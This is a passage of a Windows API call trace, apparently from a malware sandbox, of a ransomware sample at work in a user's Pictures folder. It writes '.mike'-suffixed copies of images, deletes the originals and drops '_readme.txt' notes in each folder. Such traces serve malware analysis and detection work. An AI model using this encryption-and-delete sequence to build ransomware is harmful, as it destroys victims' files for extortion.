lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0154.851] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KDyGkuZ1culRRgZpu1o2.png.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KDyGkuZ1culRRgZpu1o2.png.mike", lpFilePart=0x0) returned 0x44 [0154.851] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KDyGkuZ1culRRgZpu1o2.png", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KDyGkuZ1culRRgZpu1o2.png", lpFilePart=0x0) returned 0x3f [0154.851] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KDyGkuZ1culRRgZpu1o2.png.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KDyGkuZ1culRRgZpu1o2.png.mike", lpFilePart=0x0) returned 0x44 [0154.852] WriteFile (in: hFile=0x1c8, lpBuffer=0x21b9fac*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x21b9fac*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0154.853] CloseHandle (hObject=0x1c8) returned 1 [0154.854] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KDyGkuZ1culRRgZpu1o2.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KDyGkuZ1culRRgZpu1o2.png.mike", lpFilePart=0x0) returned 0x44 [0154.856] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KDyGkuZ1culRRgZpu1o2.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KDyGkuZ1culRRgZpu1o2.png.mike", lpFilePart=0x0) returned 0x44 [0154.857] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KDyGkuZ1culRRgZpu1o2.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KDyGkuZ1culRRgZpu1o2.png.mike", lpFilePart=0x0) returned 0x44 [0154.858] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KDyGkuZ1culRRgZpu1o2.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KDyGkuZ1culRRgZpu1o2.png.mike", lpFilePart=0x0) returned 0x44 [0154.860] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KDyGkuZ1culRRgZpu1o2.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KDyGkuZ1culRRgZpu1o2.png.mike", lpFilePart=0x0) returned 0x44 [0154.861] WriteFile (in: hFile=0x1c8, lpBuffer=0x21fde24*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x21fde24*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0154.861] CloseHandle (hObject=0x1c8) returned 1 [0154.861] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KDyGkuZ1culRRgZpu1o2.png", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KDyGkuZ1culRRgZpu1o2.png", lpFilePart=0x0) returned 0x3f [0154.861] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KDyGkuZ1culRRgZpu1o2.png.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KDyGkuZ1culRRgZpu1o2.png.mike", lpFilePart=0x0) returned 0x44 [0154.862] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KDyGkuZ1culRRgZpu1o2.png.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KDyGkuZ1culRRgZpu1o2.png.mike", lpFilePart=0x0) returned 0x44 [0154.862] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KDyGkuZ1culRRgZpu1o2.png", dwFileAttributes=0x80) returned 1 [0154.862] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KDyGkuZ1culRRgZpu1o2.png", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KDyGkuZ1culRRgZpu1o2.png", lpFilePart=0x0) returned 0x3f [0154.862] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KDyGkuZ1culRRgZpu1o2.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\kdygkuz1culrrgzpu1o2.png")) returned 1 [0154.864] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KDyGkuZ1culRRgZpu1o2.png", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KDyGkuZ1culRRgZpu1o2.png", lpFilePart=0x0) returned 0x3f [0154.864] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_readme.txt", lpFilePart=0x0) returned 0x32 [0154.865] WriteFile (in: hFile=0x1c8, lpBuffer=0x22010bc*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x22010bc*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0154.866] CloseHandle (hObject=0x1c8) returned 1 [0154.866] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\yDh2e.bmp", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\yDh2e.bmp", lpFilePart=0x0) returned 0x30 [0154.866] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0154.866] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\yns RT1bYvb6rGU.png.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\yns RT1bYvb6rGU.png.mike", lpFilePart=0x0) returned 0x3f [0154.867] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\yns RT1bYvb6rGU.png", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\yns RT1bYvb6rGU.png", lpFilePart=0x0) returned 0x3a [0154.867] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\yns RT1bYvb6rGU.png.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\yns RT1bYvb6rGU.png.mike", lpFilePart=0x0) returned 0x3f [0154.867] WriteFile (in: hFile=0x1c8, lpBuffer=0x2206888*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x2206888*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0154.868] CloseHandle (hObject=0x1c8) returned 1 [0154.871] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\yns RT1bYvb6rGU.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\yns RT1bYvb6rGU.png.mike", lpFilePart=0x0) returned 0x3f [0154.872] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\yns RT1bYvb6rGU.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\yns RT1bYvb6rGU.png.mike", lpFilePart=0x0) returned 0x3f [0154.873] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\yns RT1bYvb6rGU.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\yns RT1bYvb6rGU.png.mike", lpFilePart=0x0) returned 0x3f [0154.875] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\yns RT1bYvb6rGU.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\yns RT1bYvb6rGU.png.mike", lpFilePart=0x0) returned 0x3f [0154.877] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\yns RT1bYvb6rGU.png.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\yns RT1bYvb6rGU.png.mike", lpFilePart=0x0) returned 0x3f [0154.877] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\yns RT1bYvb6rGU.png.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\yns RT1bYvb6rGU.png.mike", lpFilePart=0x0) returned 0x3f [0154.877] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\yns RT1bYvb6rGU.png", dwFileAttributes=0x80) returned 1 [0154.877] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\yns RT1bYvb6rGU.png", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\yns RT1bYvb6rGU.png", lpFilePart=0x0) returned 0x3a [0154.878] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\yns RT1bYvb6rGU.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\yns rt1byvb6rgu.png")) returned 1 [0154.884] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\yns RT1bYvb6rGU.png", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\yns RT1bYvb6rGU.png", lpFilePart=0x0) returned 0x3a [0154.884] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_readme.txt", lpFilePart=0x0) returned 0x32 [0154.887] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0154.887] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0154.888] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0154.888] CoTaskMemFree (pv=0x508980) [0154.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0154.888] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7", lpFilePart=0x0) returned 0x3b [0154.889] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0154.890] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0154.890] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\4ySZ9bVGHz kcVg1.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\4ySZ9bVGHz kcVg1.png.mike", lpFilePart=0x0) returned 0x55 [0154.890] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\4ySZ9bVGHz kcVg1.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\4ySZ9bVGHz kcVg1.png", lpFilePart=0x0) returned 0x50 [0154.890] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\4ySZ9bVGHz kcVg1.png.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\4ySZ9bVGHz kcVg1.png.mike", lpFilePart=0x0) returned 0x55 [0154.894] WriteFile (in: hFile=0x1c8, lpBuffer=0x227e5c0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x227e5c0*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0154.895] CloseHandle (hObject=0x1c8) returned 1 [0154.895] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\4ySZ9bVGHz kcVg1.png", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\4ySZ9bVGHz kcVg1.png", lpFilePart=0x0) returned 0x50 [0154.895] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\4ySZ9bVGHz kcVg1.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\4ySZ9bVGHz kcVg1.png.mike", lpFilePart=0x0) returned 0x55 [0154.895] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\4ySZ9bVGHz kcVg1.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\4ySZ9bVGHz kcVg1.png.mike", lpFilePart=0x0) returned 0x55 [0154.896] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\4ySZ9bVGHz kcVg1.png", dwFileAttributes=0x80) returned 1 [0154.896] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\4ySZ9bVGHz kcVg1.png", nBufferLength=0x105, lpBuffer=0x2aece0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\4ySZ9bVGHz kcVg1.png", lpFilePart=0x0) returned 0x50 [0154.896] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\4ySZ9bVGHz kcVg1.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wpjjdiycybxa2lnq5xg7\\4ysz9bvghz kcvg1.png")) returned 1 [0154.897] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\4ySZ9bVGHz kcVg1.png", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\4ySZ9bVGHz kcVg1.png", lpFilePart=0x0) returned 0x50 [0154.897] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\_readme.txt", lpFilePart=0x0) returned 0x47 [0154.899] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0154.899] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\Cf63_9nmz6NBY.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\Cf63_9nmz6NBY.jpg.mike", lpFilePart=0x0) returned 0x52 [0154.899] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\Cf63_9nmz6NBY.jpg", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\Cf63_9nmz6NBY.jpg", lpFilePart=0x0) returned 0x4d [0154.899] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\Cf63_9nmz6NBY.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\Cf63_9nmz6NBY.jpg.mike", lpFilePart=0x0) returned 0x52 [0154.903] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\Cf63_9nmz6NBY.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\Cf63_9nmz6NBY.jpg.mike", lpFilePart=0x0) returned 0x52 [0154.903] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\Cf63_9nmz6NBY.jpg.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\Cf63_9nmz6NBY.jpg.mike", lpFilePart=0x0) returned 0x52 [0154.904] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\Cf63_9nmz6NBY.jpg", dwFileAttributes=0x80) returned 1 [0154.904] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\Cf63_9nmz6NBY.jpg", nBufferLength=0x105, lpBuffer=0x2aece0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\Cf63_9nmz6NBY.jpg", lpFilePart=0x0) returned 0x4d [0154.904] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\Cf63_9nmz6NBY.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wpjjdiycybxa2lnq5xg7\\cf63_9nmz6nby.jpg")) returned 1 [0154.905] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\Cf63_9nmz6NBY.jpg", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\Cf63_9nmz6NBY.jpg", lpFilePart=0x0) returned 0x4d [0154.906] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\_readme.txt", lpFilePart=0x0) returned 0x47 [0154.908] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0154.909] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0154.909] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0154.909] CoTaskMemFree (pv=0x508980) [0154.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0154.909] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ", lpFilePart=0x0) returned 0x4e [0154.910] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0154.911] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\moW9-Sh.bmp", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\moW9-Sh.bmp", lpFilePart=0x0) returned 0x5a [0154.911] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0154.911] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ", lpFilePart=0x0) returned 0x4e [0154.911] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\", lpFilePart=0x0) returned 0x4f [0154.911] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\WpjjdiycYBXa2Lnq5XG7\\6OnZWN8PiEwFKyH7zZ\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35e2ec60, ftCreationTime.dwHighDateTime=0x1d4cdf6, ftLastAccessTime.dwLowDateTime=0xaf636ad0, ftLastAccessTime.dwHighDateTime=0x1d4d164, ftLastWriteTime.dwLowDateTime=0xaf636ad0, ftLastWriteTime.dwHighDateTime=0x1d4d164, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0154.911] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35e2ec60, ftCreationTime.dwHighDateTime=0x1d4cdf6, ftLastAccessTime.dwLowDateTime=0xaf636ad0, ftLastAccessTime.dwHighDateTime=0x1d4d164, ftLastWriteTime.dwLowDateTime=0xaf636ad0, ftLastWriteTime.dwHighDateTime=0x1d4d164, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.911] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c7ea0, ftCreationTime.dwHighDateTime=0x1d4d451, ftLastAccessTime.dwLowDateTime=0x61832580, ftLastAccessTime.dwHighDateTime=0x1d4cffc, ftLastWriteTime.dwLowDateTime=0x61832580, ftLastWriteTime.dwHighDateTime=0x1d4cffc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3biM98XncEHgqHKkbpX", cAlternateFileName="3BIM98~1")) returned 1 [0154.911] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43d64a90, 